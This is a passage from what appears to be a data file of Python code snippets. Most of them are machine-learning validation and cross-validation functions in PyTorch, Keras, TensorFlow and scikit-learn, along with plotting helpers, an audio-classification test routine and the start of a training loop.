epochs=epoch[0]+epoch[1],\n initial_epoch=epoch[0],\n verbose=1,\n max_queue_size=10,\n validation_data=genVal,\n validation_steps=validation_steps,\n callbacks=callbacks)\n\n print 'Model performance\\tloss\\t\\taccuracy'\n print '\\tTrain:\\t\\t%.4f\\t\\t%.4f' % tuple(model.evaluate_generator(generate_batches_from_files(files['train'], batchsize, args.wires, var_targets), steps=50))\n print '\\tValid:\\t\\t%.4f\\t\\t%.4f' % tuple(model.evaluate_generator(generate_batches_from_files(files['val'] , batchsize, args.wires, var_targets), steps=50))\n return model", "def validate(val_loader, model, criterion, epoch):\n global args, writer\n batch_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n\n # switch to evaluate mode\n model.eval()\n #if not args.multi_gpu:\n # if model.beta_ema > 0:\n # old_params = model.get_params()\n # model.load_ema_params()\n #else:\n # if model.module.beta_ema > 0:\n # old_params = model.module.get_params()\n # model.module.load_ema_params()\n end = time.time()\n loss_part = []\n acc_part = []\n with torch.no_grad():\n for i, (input_, target) in enumerate(val_loader):\n if torch.cuda.is_available():\n target = target.cuda(async=True)\n input_ = input_.cuda()\n #input_var = torch.autograd.Variable(input_, volatile=True)\n #target_var = torch.autograd.Variable(target, volatile=True)\n\n # compute output\n output = model(input_)\n preds = output.max(dim=1)[1]\n loss = criterion(output, target, model)\n\n # measure accuracy and record loss\n #prec1 = accuracy(output.data, target, topk=(1,))[0]\n prec1 = (preds == target).sum().item() / preds.size(0)\n losses.update(loss.item(), input_.size(0))\n top1.update(100 - prec1*100, input_.size(0))\n loss_part.append(loss.item())\n acc_part.append(prec1)\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if (i+1) % args.print_freq == 0 and args.verbose:\n print('Test: [{0}/{1}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Err@1 {top1.val:.3f} ({top1.avg:.3f})'.format(\n i, len(val_loader), batch_time=batch_time, loss=losses,\n top1=top1))\n if args.verbose:\n print(' * Err@1 {top1.avg:.3f}'.format(top1=top1))\n #if not args.multi_gpu:\n # if model.beta_ema > 0:\n # model.load_params(old_params)\n #else:\n # if model.module.beta_ema > 0:\n # model.module.load_params(old_params)\n\n # log to TensorBoard\n if writer is not None:\n writer.add_scalar('val/loss', losses.avg, epoch)\n writer.add_scalar('val/err', top1.avg, epoch)\n writer.add_scalar('val/acc', np.mean(acc_part))\n layers = model.layers if not args.multi_gpu else model.module.layers\n for k, layer in enumerate(layers):\n if hasattr(layer, 'qz_loga'):\n mode_z = layer.sample_z(1, sample=0).view(-1)\n writer.add_histogram('mode_z/layer{}'.format(k), mode_z.cpu().data.numpy(), epoch)\n\n return np.mean(loss_part), np.mean(acc_part)", "def cross_validation_visualization(lambdas, loss_train, loss_test):\n plt.semilogx(lambdas, loss_train, marker=\".\", color='b', label='train error')\n plt.semilogx(lambdas, loss_test, marker=\".\", color='r', label='test error')\n plt.xlabel(\"lambda\")\n plt.ylabel(\"rmse\")\n plt.title(\"cross validation\")\n plt.legend(loc=2)\n plt.grid(True)\n plt.savefig(\"cross_validation_mse\")", "def validate(model, loader, loss_function,\n device, step, tb_logger=None):\n # set the model to eval mode\n model.eval()\n n_batches = len(loader)\n\n # we record the loss and the predictions / labels for all samples\n mean_loss = 0\n predictions = []\n labels = []\n\n # the model parameters are not updated during validation,\n # hence we can disable gradients in order to save memory\n with torch.no_grad():\n for x, y in loader:\n x = x.to(device)\n y = y.to(device)\n prediction = model(x)\n\n # update the loss\n # the loss function expects a 1d tensor, so we get rid of the second\n # singleton dimensions that is added by the loader when stacking across the batch function\n mean_loss += loss_function(prediction, y[:, 0]).item()\n\n # compute the most likely class predictions\n # note that 'max' returns a tuple with the\n # index of the maximun value (which correponds to the predicted class)\n # as second entry\n prediction = prediction.max(1, keepdim=True)[1]\n\n # store the predictions and labels\n predictions.append(prediction[:, 0].to('cpu').numpy())\n labels.append(y[:, 0].to('cpu').numpy())\n\n # predictions and labels to numpy arrays\n predictions = np.concatenate(predictions)\n labels = np.concatenate(labels)\n\n # log the validation results if we have a tensorboard\n if tb_logger is not None:\n\n accuracy_error = 1. - metrics.accuracy_score(labels, predictions)\n mean_loss /= n_batches\n\n # TODO log more advanced things like confusion matrix, see\n # https://www.tensorflow.org/tensorboard/image_summaries\n\n tb_logger.add_scalar(tag=\"validation-error\",\n global_step=step,\n scalar_value=accuracy_error)\n tb_logger.add_scalar(tag=\"validation-loss\",\n global_step=step,\n scalar_value=mean_loss)\n\n # return all predictions and labels for further evaluation\n return predictions, labels", "def crossValidate(dataset, folds):\n\tshuffle(dataset)\n\tcv_results = []\n\tprecision_recall_acc = []\n\tfoldSize = int(len(dataset)/folds)\n\tfor i in range(0,len(dataset),foldSize):\n\t\t# preparing data\n\t\tvalD = dataset[i:i+foldSize]\n\t\ttestD = dataset[:i]+dataset[i+foldSize:] #list(set(dataset)-set(dataset[i:i+foldSize]))\n\t\t# Training\n\t\tprint(\"*\"*60)\n\t\tprint(\"Training on data-set size \"+str(len(testD))+\" of batch \"+str(i/(foldSize)))\n\t\tclassi = trainClassifier(testD)\n\t\t# Prediction on validation data \n\t\tprint(\"Predicting on heldout data-set size...\"+str(len(valD))+\" of batch \"+str(i/(foldSize)))\n\t\ty_true = list(map(lambda t: t[1], valD))\n\t\ty_pred = predictLabels(valD,classi)\t\t\n\t\t# Performance Metrics\t\t\n\t\t# average based on macro as it calculate metrics for each label, and find their unweighted mean.\n\t\tprecision_recall = list(precision_recall_fscore_support(y_true, y_pred, average='macro'))\n\t\tacc = accuracy_score(y_true,y_pred)\n\t\tprecision_recall[-1] = acc\n\t\tprint(precision_recall)\n\t\tprecision_recall_acc.append(precision_recall)\n\tdf = pd.DataFrame(precision_recall_acc,columns = [\"Precision\",\"Recall\",\"F1 score\",\"Accuracy Score\"])\n\tprint(df)\n\tcv_results = df.mean().tolist()\n\treturn cv_results", "def visualization(epochs, mse_tr, mse_te):\n plt.semilogx(epochs, mse_tr, marker=\".\", color='b', label='train error')\n plt.semilogx(epochs, mse_te, marker=\".\", color='r', label='test error')\n plt.xlabel(\"k\")\n plt.ylabel(\"rmse\")\n plt.title(\"cross validation\")\n plt.legend(loc=2)\n plt.grid(True)\n plt.savefig(\"cross_validation\")", "def run_CV(X,y,model,func, n_splits = 3, how = 'up', categorical = 'label_encoder'):\n logloss = []\n skf = StratifiedKFold(n_splits = n_splits, random_state = 144)\n for i, (train_idx, val_idx) in enumerate(skf.split(X,y)):\n X_train, X_val = X.iloc[train_idx], X.iloc[val_idx]\n y_train, y_val = y[train_idx], y[val_idx]\n\n # # SMOTE\n # X_train = X_train.drop('poor', axis = 1) # drop target\n # cat_columns = X_train.select_dtypes(['object']).columns\n # X_train[cat_columns] = X_train[cat_columns].apply(LabelEncoder().fit_transform)\n # orig_cols = X_train.columns # SMOTE will return a numpy array. Store the column names here to recreate the dataframe for feature engineering/transforms below\n # X_train, y_train = SMOTE().fit_sample(X_train,y_train)\n # # recreate dataframe\n # X_train = pd.DataFrame(X_train, columns = orig_cols)\n\n if how is not None:\n # resample to balance data\n X_resampled = resample_data(X_train, how = how)\n # store the targets now that they are balanced\n y_train = X_resampled['poor']\n # drop target from train\n X_train = X_resampled.drop('poor', axis = 1)\n X_val.drop('poor', axis = 1, inplace = True)\n # print(X_val.columns.values)\n ####### feature engineering goes blow this comment:\n \n func(X_train)\n func(X_val)\n \n ###### end feature eng\n X_train = pre_process_data(X_train, normalize_num='standardize', categorical = categorical)\n assert X_train.shape[0] == y_train.shape[0]\n\n model.fit(X_train, y_train)\n # standardize X_val to predict\n X_val = pre_process_data(X_val,normalize_num= 'standardize', enforce_cols=X_train.columns, categorical = categorical)\n preds = model.predict_proba(X_val)\n \n logloss.append(log_loss(y_val, preds[:,1]))\n \n return logloss", "def run_cross_validation_process_test(info_string, models):\n\n batch_size = 64\n num_fold = 0\n yfull_test = []\n x_test_id = []\n nfolds = len(models)\n\n datagen_test = ImageDataGenerator(\n featurewise_center=True,\n featurewise_std_normalization=True,\n preprocessing_function=pre_processing_image\n )\n\n # print(image_array.shape)\n x_test, x_test_id = load_images_test()\n print(len(x_test))\n image_test_array = np.asarray(x_test, dtype=np.float32)\n start_time = time.time()\n print(\"Datagen.fit started\")\n datagen_test.fit(image_test_array, augment=False)\n print('Fit Completed: {} seconds'.format(round(time.time() - start_time, 2)))\n\n for i in range(nfolds):\n model = models[i]\n num_fold += 1\n print('Start KFold number {} from {}'.format(num_fold, nfolds))\n\n #test_prediction = model.predict_generator(generator=datagen_test.fit(image_test_array, seed=79),\n # steps=len(image_test_array)/32, max_q_size=20, workers=8, verbose=1)\n\n test_prediction = model.predict(image_test_array, batch_size=batch_size, verbose=1)\n\n yfull_test.append(test_prediction)\n\n test_res = merge_several_folds_mean(yfull_test, nfolds)\n info_string = 'loss_' + info_string \\\n + '_folds_' + str(nfolds)\n create_submission(test_res, x_test_id, info_string)\n d=pd.DataFrame(test_res,columns=FISH_CLASSES)", "def validation_classification(model, val_dataloader, epoch, criterion, cfg,\n writer):\n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n model.eval()\n\n end = time.time()\n with torch.no_grad():\n for step, data in enumerate(val_dataloader):\n data_time.update(time.time() - end)\n val_batch = data[0].cuda()\n val_label = data[1].cuda()\n outputs = model(val_batch)\n\n loss = criterion(outputs, val_label)\n if cfg.CONFIG.DATA.NUM_CLASSES < 5:\n prec1a, prec5a = accuracy(outputs.data, val_label, topk=(1, 1))\n # Tricky solution for datasets with less than 5 classes, top5 acc is always set to 100%\n prec5a = 100\n else:\n prec1a, prec5a = accuracy(outputs.data, val_label, topk=(1, 5))\n\n losses.update(loss.item(), val_batch.size(0))\n top1.update(prec1a.item(), val_batch.size(0))\n top5.update(prec5a.item(), val_batch.size(0))\n batch_time.update(time.time() - end)\n end = time.time()\n\n if step % cfg.CONFIG.LOG.DISPLAY_FREQ == 0 and cfg.DDP_CONFIG.GPU_WORLD_RANK == 0:\n logger.info('----validation----')\n print_string = 'Epoch: [{0}][{1}/{2}]'.format(\n epoch, step + 1, len(val_dataloader))\n logger.info(print_string)\n print_string = 'data_time: {data_time:.3f}, batch time: {batch_time:.3f}'.format(\n data_time=data_time.val, batch_time=batch_time.val)\n logger.info(print_string)\n print_string = 'loss: {loss:.5f}'.format(loss=losses.avg)\n logger.info(print_string)\n print_string = 'Top-1 accuracy: {top1_acc:.2f}%, Top-5 accuracy: {top5_acc:.2f}%'.format(\n top1_acc=top1.avg, top5_acc=top5.avg)\n logger.info(print_string)\n\n eval_path = cfg.CONFIG.LOG.EVAL_DIR\n if not os.path.exists(eval_path):\n os.makedirs(eval_path)\n\n with open(\n os.path.join(eval_path,\n \"{}.txt\".format(cfg.DDP_CONFIG.GPU_WORLD_RANK)),\n 'w') as f:\n f.write(\"{} {} {}\\n\".format(losses.avg, top1.avg, top5.avg))\n torch.distributed.barrier()\n\n loss_lst, top1_lst, top5_lst = [], [], []\n if cfg.DDP_CONFIG.GPU_WORLD_RANK == 0 and writer is not None:\n print(\"Collecting validation numbers\")\n for x in range(cfg.DDP_CONFIG.GPU_WORLD_SIZE):\n data = open(os.path.join(\n eval_path,\n \"{}.txt\".format(x))).readline().strip().split(\" \")\n data = [float(x) for x in data]\n loss_lst.append(data[0])\n top1_lst.append(data[1])\n top5_lst.append(data[2])\n print(\"Global result:\")\n print_string = 'loss: {loss:.5f}'.format(loss=np.mean(loss_lst))\n print(print_string)\n print_string = 'Top-1 accuracy: {top1_acc:.2f}%, Top-5 accuracy: {top5_acc:.2f}%'.format(\n top1_acc=np.mean(top1_lst), top5_acc=np.mean(top5_lst))\n print(print_string)\n writer.add_scalar('val_loss_epoch', np.mean(loss_lst), epoch)\n writer.add_scalar('val_top1_acc_epoch', np.mean(top1_lst), epoch)\n writer.add_scalar('val_top5_acc_epoch', np.mean(top5_lst), epoch)", "def __call__(self, targets, logits, seq_length):\n\t\t# Clean spectograms of sources\n\t\tspectrogram_targets = targets['multi_targets']\n\n\t\t# Spectogram of the original mixture, used to mask for scoring\n\t\tmix_to_mask = targets['mix_to_mask']\n\n\t\t# Length of sequences\n\t\tseq_length = seq_length['bin_emb']\n\t\t# Logits (=output network)\n\t\temb_vec = logits['bin_emb']\n\t\tanchors = logits['anchors']\n\n\t\tif 'speaker_logits' in logits:\n\t\t\t# Assuming dimensions are B x T x S\n\t\t\tspeaker_logits = logits['speaker_logits']\n\t\t\tav_speaker_logits_time_flag = self.lossconf['av_speaker_logits_time_flag'] == 'True'\n\t\telse:\n\t\t\tspeaker_logits = None\n\n\t\tif 'anchors_scale' in logits:\n\t\t\t# Assuming dimensions are B x T x S\n\t\t\tanchors_scale = logits['anchors_scale']\n\t\t\tanchors_scale = anchors_scale[0, 0]\n\t\telse:\n\t\t\tanchors_scale = None\n\n\t\ttime_anchors_flag = self.lossconf['time_anchors_flag'] == 'True'\n\t\tav_anchors_time_flag = (self.lossconf['av_anchors_time_flag'] == 'True') and time_anchors_flag\n\t\tactivation = self.lossconf['activation']\n\t\tnormalize_embs = self.lossconf['normalize_embs'] == 'True'\n\t\tnormalize_anchors = self.lossconf['normalize_anchors'] == 'True'\n\t\tif 'do_square' in self.lossconf:\n\t\t\tdo_square = self.lossconf['do_square'] == 'True'\n\t\telse:\n\t\t\tdo_square = True\n\n\t\twith tf.name_scope('anchor_deepattractornet_loss'):\n\n\t\t\tfeat_dim = spectrogram_targets.get_shape()[2]\n\t\t\temb_dim = anchors.get_shape()[-1]\n\t\t\ttime_dim = tf.shape(anchors)[1]\n\t\t\tnrS = spectrogram_targets.get_shape()[3]\n\n\t\t\tV = tf.reshape(emb_vec, [self.batch_size, -1, feat_dim, emb_dim], name='V') # dim: (B x T x F x D)\n\t\t\tif normalize_embs:\n\t\t\t\tV = V / (tf.norm(V, axis=-1, keepdims=True) + 1e-12)\n\t\t\ttime_dim = tf.shape(V)[1]\n\n\t\t\tif not time_anchors_flag:\n\t\t\t\tanchors = tf.tile(tf.expand_dims(tf.expand_dims(anchors, 0), 0), [self.batch_size, time_dim, 1, 1]) # dim: (B x T x S x D)\n\n\t\t\tif normalize_anchors:\n\t\t\t\tanchors = anchors / (tf.norm(anchors, axis=-1, keepdims=True) + 1e-12)\n\n\t\t\tif speaker_logits is not None:\n\t\t\t\tspeaker_logits = tf.expand_dims(speaker_logits, -1)\n\t\t\t\tif av_speaker_logits_time_flag:\n\t\t\t\t\tspeaker_logits = tf.reduce_mean(speaker_logits, 1, keepdims=True)\n\t\t\t\tanchors *= speaker_logits\n\n\t\t\tif anchors_scale is not None:\n\t\t\t\tanchors *= anchors_scale\n\n\t\t\tif av_anchors_time_flag:\n\t\t\t\tanchors = tf.reduce_mean(anchors, axis=1, keepdims=True)\n\t\t\t\tanchors = tf.tile(anchors, [1, time_dim, 1, 1])\n\n\t\t\tprod_1 = tf.matmul(V, anchors, transpose_a=False, transpose_b=True, name='AVT')\n\n\t\t\tif activation == 'softmax':\n\t\t\t\tmasks = tf.nn.softmax(prod_1, axis=-1, name='M') # dim: (B x T x F x nrS)\n\t\t\telif activation in ['None', 'none', None]:\n\t\t\t\tmasks = prod_1\n\t\t\telif activation == 'sigmoid':\n\t\t\t\tmasks = tf.nn.sigmoid(prod_1, name='M')\n\t\t\telse:\n\t\t\t\tmasks = tf.nn.sigmoid(prod_1, name='M')\n\n\t\t\tX = tf.expand_dims(mix_to_mask, -1, name='X') # dim: (B x T x F x 1)\n\t\t\treconstructions = tf.multiply(masks, X) # dim: (B x T x F x nrS)\n\t\t\treconstructions = tf.transpose(reconstructions, perm=[3, 0, 1, 2]) # dim: (nrS x B x T x F)\n\n\t\t\tS = tf.transpose(spectrogram_targets, [3, 0, 1, 2]) # nrS x B x T x F\n\n\t\t\tif 'vad_targets' in targets:\n\t\t\t\toverlap_weight = float(self.lossconf['overlap_weight'])\n\t\t\t\tvad_sum = tf.reduce_sum(targets['vad_targets'], -1)\n\t\t\t\tbin_weights = tf.where(\n\t\t\t\t\tvad_sum > 1,\n\t\t\t\t\ttf.ones([self.batch_size, time_dim]) * overlap_weight,\n\t\t\t\t\ttf.ones([self.batch_size, time_dim]))\n\t\t\t\tbin_weights = tf.expand_dims(bin_weights, -1) # broadcast the frame weights to all bins\n\t\t\t\tnorm = tf.reduce_sum(bin_weights) * tf.to_float(feat_dim)\n\t\t\telse:\n\t\t\t\tbin_weights = None\n\t\t\t\tnorm = tf.to_float(tf.reduce_sum(seq_length) * feat_dim)\n\n\t\t\tloss = ops.base_pit_loss(reconstructions, S, bin_weights=bin_weights, overspeakererized=False, do_square=do_square)\n\n\t\treturn loss, norm", "def eval_epoch(model,\n validation_data,\n device\n ):\n\n model.eval()\n\n total_loss = 0\n kl_total_loss = 0\n n_word_total = 0\n n_syn_correct_total = 0\n n_lvl_correct_total = 0\n\n with torch.no_grad():\n for batch in tqdm(\n validation_data, desc=' [Validation] ', leave=True):\n # prepare data\n src_syn, src_lvl, src_pos, src_lengths, src_path_mask, \\\n tmpl_syn, tmpl_lvl, tmpl_pos, tmpl_lengths, tmpl_path_mask, \\\n tgt_syn, tgt_lvl, tgt_pos, tgt_lengths, _ = map(lambda x: x.to(device), batch)\n syn_gold_insts = tgt_syn[:, 1:]\n lvl_gold_insts = tgt_lvl[:, 1:]\n\n # forward\n syn_pred, lvl_pred, _ = model(\n src_syn_seqs=src_syn,\n src_lvl_seqs=src_lvl,\n src_pos_seqs=src_pos,\n src_path_masks=src_path_mask,\n tmpl_syn_seqs=tmpl_syn,\n tmpl_lvl_seqs=tmpl_lvl,\n tmpl_pos_seqs=tmpl_pos,\n tmpl_path_masks=tmpl_path_mask,\n tgt_syn_seqs=tgt_syn,\n tgt_lvl_seqs=tgt_lvl,\n tgt_pos_seqs=tgt_pos\n )\n\n # metrics\n syn_reconstruction_loss = cal_nll_loss(syn_pred, syn_gold_insts)\n lvl_reconstruction_loss = cal_nll_loss(lvl_pred, lvl_gold_insts)\n kl_loss = 0\n loss = syn_reconstruction_loss + lvl_reconstruction_loss + kl_loss\n\n n_syn_correct = cal_accuracy(syn_pred, syn_gold_insts)\n n_lvl_correct = cal_accuracy(lvl_pred, lvl_gold_insts)\n\n # note keeping\n total_loss += loss.item()\n kl_total_loss += kl_loss\n\n non_pad_mask = lvl_gold_insts.ne(Constants.PAD)\n n_word = non_pad_mask.sum().item()\n n_word_total += n_word\n n_syn_correct_total += n_syn_correct\n n_lvl_correct_total += n_lvl_correct\n\n loss_per_word = total_loss / n_word_total\n kl_loss_per_word = kl_total_loss / n_word_total\n syn_accuracy = n_syn_correct_total / n_word_total\n lvl_accuracy = n_lvl_correct_total / n_word_total\n return loss_per_word, kl_loss_per_word, syn_accuracy, lvl_accuracy", "def validate(validateloader, model, batch_size, epoch, iterations,\n criterion_cls=None, class_nms=None,\n criterion_ofs=None, offset_list=None,\n print_freq=10, log_freq=1000, tensorboard=True, score=False, alpha=1):\n model.eval()\n if criterion_cls:\n n_classes = len(class_nms)\n cls_losses = AverageMeter()\n if score:\n score_metrics = runningScore(n_classes, class_nms)\n if criterion_ofs:\n ofs_losses = AverageMeter()\n if score:\n offset_metrics = offsetIoU(offset_list)\n all_losses = AverageMeter()\n batch_time = AverageMeter()\n\n end = time.time()\n for i, (img, target) in enumerate(validateloader):\n\n with torch.no_grad():\n img = img.cuda()\n target = target.cuda()\n if criterion_cls:\n class_target = target[:, :n_classes, :, :]\n if criterion_ofs:\n ofs_target = target[:, n_classes:, :, :]\n elif criterion_ofs:\n ofs_target = target\n\n prediction = model(img) # forward network\n\n if criterion_cls:\n class_pred = prediction[:, :n_classes, :, :]\n if criterion_ofs:\n ofs_pred = prediction[:, n_classes:, :, :]\n elif criterion_ofs:\n ofs_pred = prediction\n\n if criterion_cls:\n cls_loss = criterion_cls(class_pred, class_target)\n cls_losses.update(cls_loss.item(), batch_size)\n if criterion_ofs:\n ofs_loss = criterion_ofs(ofs_pred, ofs_target)\n ofs_losses.update(ofs_loss.item(), batch_size)\n\n if criterion_cls and criterion_ofs: # both case\n all_loss = cls_loss + alpha * ofs_loss\n elif criterion_cls: # class only case\n all_loss = cls_loss\n elif criterion_ofs: # offset only case\n all_loss = ofs_loss\n\n all_losses.update(all_loss.item(), batch_size)\n\n if criterion_cls and score:\n score_metrics.update(\n torch.sigmoid(class_pred), class_target)\n if criterion_ofs and score:\n offset_metrics.update(\n torch.sigmoid(ofs_pred), ofs_target)\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n if i % print_freq == 0:\n print('Val: [{0}][{1}/{2}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'.format(\n epoch, i, len(validateloader), batch_time=batch_time))\n\n # log to TensorBoard\n if tensorboard:\n if criterion_cls:\n log_value('val_cls_loss', cls_losses.avg,\n int(iterations / log_freq))\n if criterion_ofs:\n log_value('val_ofs_loss', ofs_losses.avg,\n int(iterations / log_freq))\n\n if criterion_cls and score:\n scores, class_iou = score_metrics.get_scores()\n mean_cls_iou = scores['mean_IU']\n if tensorboard:\n log_value('val_iou', mean_cls_iou, epoch)\n score_metrics.print_stat()\n\n if criterion_ofs and score:\n iou, mean_ofs_iou = offset_metrics.get_scores()\n if tensorboard:\n log_value('val_ofs_miou', mean_ofs_iou, epoch)\n log_value('val_ofs_1_iou', iou[0], epoch)\n log_value('val_ofs_2_iou', iou[1], epoch)\n offset_metrics.print_stat()\n\n if criterion_cls and criterion_ofs:\n mean_iou = mean_cls_iou + mean_ofs_iou\n elif criterion_cls:\n mean_iou = mean_cls_iou\n elif criterion_ofs:\n mean_iou = mean_ofs_iou\n\n return mean_iou", "def validate(model,val_dataloader,loss_fn):\n model.eval()\n total_loss = 0\n \n for batch_index, batch in enumerate(val_dataloader):\n batch = batch[0].view(-1,1,28,28).float()\n output_batch = model(batch)\n total_loss += loss_fn(batch, output_batch, model.prev_means, model.prev_vars)\n\n total_loss *= float(val_dataloader.batch_size) / len(val_dataloader.dataset)\n return total_loss", "def tenfold_cross_validation(X, y):\n\n i = 0\n x_score = []\n y_score = []\n\n for i in range(1, 11):\n for train_index, test_index in KFold(10).split(X):\n x_train, x_test = X[train_index], X[test_index]\n y_train, y_test = y[train_index], y[test_index]\n\n # change the parameters to see how each parameter affects the l1inear classifier\n linear_classifier = linear_model.SGDClassifier(max_iter=1000, tol=1e-3)\n\n # start training the classifier\n linear_classifier.fit(x_train, y_train)\n\n # create and plot the confusion matrix\n # cross validation done with cross_val_\n y_train_pred = cross_val_predict(linear_classifier, x_test, y_test, cv=10)\n\n print(\"\\n Statistics and Confusion matrix obtained with pandas_ml: \\n\")\n cm = ConfusionMatrix(y_test, y_train_pred)\n stats = cm.stats()\n\n file = open(\"linear_classification_9000_cross_validation_\" + str(i) + \".txt\", \"w\")\n file.write(str(stats))\n file.close()\n\n # cm.print_stats()\n # print confusion matrix\n cm.plot(normalized=True)\n plt.show()", "def validation(model, val_loader, device, writer, iterator, log_path, includeHeading):\r\n model.eval()\r\n total_loss = 0.0\r\n \r\n numBatches = len(val_loader)\r\n final = False\r\n start = True\r\n \r\n # for each batch\r\n with torch.no_grad():\r\n for i, data in enumerate(val_loader, 0):\r\n \r\n data = data.to(device)\r\n \r\n # If first or last batch \r\n if i == 1:\r\n start = False\r\n \r\n if i+1 == numBatches:\r\n final = True\r\n \r\n # Apply model to data\r\n prediction = model(data, final, start)\r\n \r\n # Calculate loss of the batch\r\n prediction = torch.clamp(prediction, 0, 255, out=None)\r\n loss = torch.nn.functional.mse_loss(prediction, data.y)\r\n total_loss += loss.item()\r\n \r\n # Dump images from first batch\r\n if i == 0:\r\n \r\n # Retransform to images\r\n y_predict = retransformToImage(prediction.cpu().detach().numpy(), includeHeading)\r\n y_true = retransformToImage(data.y.cpu().detach().numpy(), includeHeading)\r\n \r\n # Dump images\r\n writer.write_image(y_predict, iterator, if_predict=True, includeHeading = includeHeading)\r\n writer.write_image(y_true, iterator, if_predict=False, includeHeading = includeHeading)\r\n \r\n # Print and dump Total validation loss \r\n valLoss = total_loss / len(val_loader)\r\n print(\"Validation loss = {:.2f}\".format(valLoss))\r\n # write the validation loss to tensorboard\r\n writer.write_loss_validation(valLoss, iterator)\r\n \r\n pickle.dump(valLoss, open(os.path.join(log_path,'valLoss.data'), 'wb'))\r\n \r\n return valLoss", "def validate(val_loader, model, epoch, cfg):\n batch_time = meter.TimeMeter(True)\n data_time = meter.TimeMeter(True)\n prec = meter.ClassErrorMeter(topk=[1], accuracy=True)\n\n # testing mode\n model.eval()\n\n for i, (shapes, labels) in enumerate(val_loader):\n batch_time.reset()\n # bz x 12 x 3 x 224 x 224\n labels = labels.long().view(-1)\n shapes = Variable(shapes)\n labels = Variable(labels)\n\n # shift data to GPU\n if cfg.cuda:\n shapes = shapes.cuda()\n labels = labels.cuda()\n\n # forward, backward optimize\n preds = model(shapes)\n\n if cfg.have_aux:\n preds, aux = preds\n\n prec.add(preds.data, labels.data)\n\n if i % cfg.print_freq == 0:\n print('Epoch: [{0}][{1}/{2}]\\t'\n 'Batch Time {batch_time:.3f}\\t'\n 'Epoch Time {data_time:.3f}\\t'\n 'Prec@1 {top1:.3f}\\t'.format(\n epoch, i, len(val_loader), batch_time=batch_time.value(),\n data_time=data_time.value(), top1=prec.value(1)))\n\n print('mean class accuracy at epoch {0}: {1} '.format(epoch, prec.value(1)))\n\n return prec.value(1)", "def cross_validate(featureFile, nFolds, verbosity = False, percentTData = 1., extype='attribution'):\n oData,aData = importC5(featureFile)\n nAuthors = len(set(aData))\n if extype == 'attribution' and np.mean(Counter(aData).values()) != Counter(aData).values()[0]:\n print('Number of docs per author should be equal in attribution experiment')\n docsPerFold = len(oData) / nFolds\n cMatrix = np.zeros( (nAuthors, nAuthors) )\n\n for N in range(0,nFolds):\n testAuthors = list()\n trainAuthors= list()\n testData = list()\n trainData = list()\n for idv in range(0,len(oData)):\n if (N+idv) % nFolds == 0:\n testData.append(oData[idv])\n testAuthors.append(aData[idv])\n else:\n trainData.append(oData[idv])\n trainAuthors.append(aData[idv]) \n teFile = '%s.cvtest' % (os.path.splitext(featureFile)[0])\n trFile = '%s.cvtrain' % (os.path.splitext(featureFile)[0])\n tAmount = int(round(len(trainAuthors) * percentTData)) # limit training data\n exportFoldFile(testData, testAuthors, teFile)\n exportFoldFile(trainData[0:tAmount], trainAuthors[0:tAmount], trFile)\n predict = classify(trFile, teFile, len(oData[0]))\n if extype != 'attribution':\n cMatrix += confusionMatrix(testAuthors, predict, extype)\n os.remove(teFile)\n os.remove(trFile)\n if percentTData != 1.0: print('Ran CV only with %.f %% (%d docs) of training data.' % (percentTData * 100, tAmount))\n return cMatrix", "def test():\r\n le = preprocessing.LabelEncoder()\r\n le.fit([\"Door Knocking\",\"Shower Running\",\"Toilet Flushing\",\"Vacuum Cleaning\",\"Keyboard Typing\", # encode class labels as numeric id values\r\n \"Coughing\",\"Neutral\"])\r\n \r\n if torch.cuda.is_available():\r\n device = \"cuda:0\"\r\n use_cuda = True\r\n else:\r\n device = \"cpu\"\r\n use_cuda = False\r\n \r\n myModel, start_epoch, train_hist = loadCheckpoint(31, use_cuda)\r\n \r\n #myModel = myModel.double()\r\n myModel = myModel.to(device, dtype=torch.double)\r\n next(myModel.parameters()).device # Check that it is on Cuda\r\n \r\n file_names = []\r\n class_ids = []\r\n max_s = 1\r\n sr = 44100 \r\n for entry in os.scandir(\"test wavs/\"): # for each folder corresponding to a class in dataset\r\n class_id = entry.name # get class numeric id according to label encoder\r\n relative_path = \"test wavs/\"+entry.name # get path location of data sample for loading audio\r\n file_names.append(relative_path) # append to list\r\n class_ids.append(class_id)\r\n\r\n max_s = 1\r\n sr = 44100\r\n X_test = [] \r\n for i in range(len(file_names)):\r\n audio = LoadAudio.load(file_names[i]) # load audio file\r\n audio = LoadAudio.resample(audio, sr) # resample audio\r\n audio = LoadAudio.mono(audio) # make audio stereo\r\n audio = LoadAudio.resize(audio, max_s) # resize audio \r\n sgram = LoadAudio.spectrogram(audio, n_mels=128, n_fft=1024, hop_len=None) # create spectrogram \r\n sgram = LoadAudio.hpssSpectrograms(audio,sgram)\r\n sgram_tensor = torch.tensor(sgram)\r\n X_test.append(sgram_tensor)\r\n\r\n pred = np.array([])\r\n for i in range(len(X_test)):\r\n inputs = X_test[i]\r\n # Normalize the inputs\r\n inputs_m, inputs_s = inputs.mean(), inputs.std()\r\n inputs = (inputs - inputs_m) / inputs_s\r\n inputs = inputs.unsqueeze(0)\r\n inputs = inputs.double()\r\n \r\n # Get predictions\r\n outputs = myModel(inputs)\r\n\r\n # Get the predicted class with the highest score\r\n _, predicted = torch.max(outputs.data, 1)\r\n \r\n pred = np.append(pred, le.inverse_transform(predicted.detach().cpu().numpy()))\r\n \r\n\r\n df = pd.DataFrame(pred, columns=[\"Predicted\"]) # save predictions as a datafram column\r\n df['True'] = class_ids # save true class as a datafram column\r\n print(\"\\nPredicted:\", df)", "def train(self, lr=0.001, clip=5, val_frac=0.1, print_every=10):\n df = pandas.DataFrame(columns=['Epoch', 'Step', 'Last Train Loss', 'Mean Test Loss'])\n self.timer.start()\n self.model.train()\n\n if self.model.train_on_gpu:\n self.model.cuda()\n\n counter = 0\n h = None\n for e in range(self.epochs):\n if h is None: # initialize hidden state\n h = self.model.init_hidden(self.reader.batch_size)\n\n for x, y in self.reader.get_train_data(): # get_batches(data, batch_size, seq_length):\n counter += 1\n inputs, targets = torch.from_numpy(x), torch.from_numpy(y)\n\n if self.model.train_on_gpu:\n inputs, targets = inputs.cuda(), targets.cuda()\n\n # Creating new variables for the hidden state, 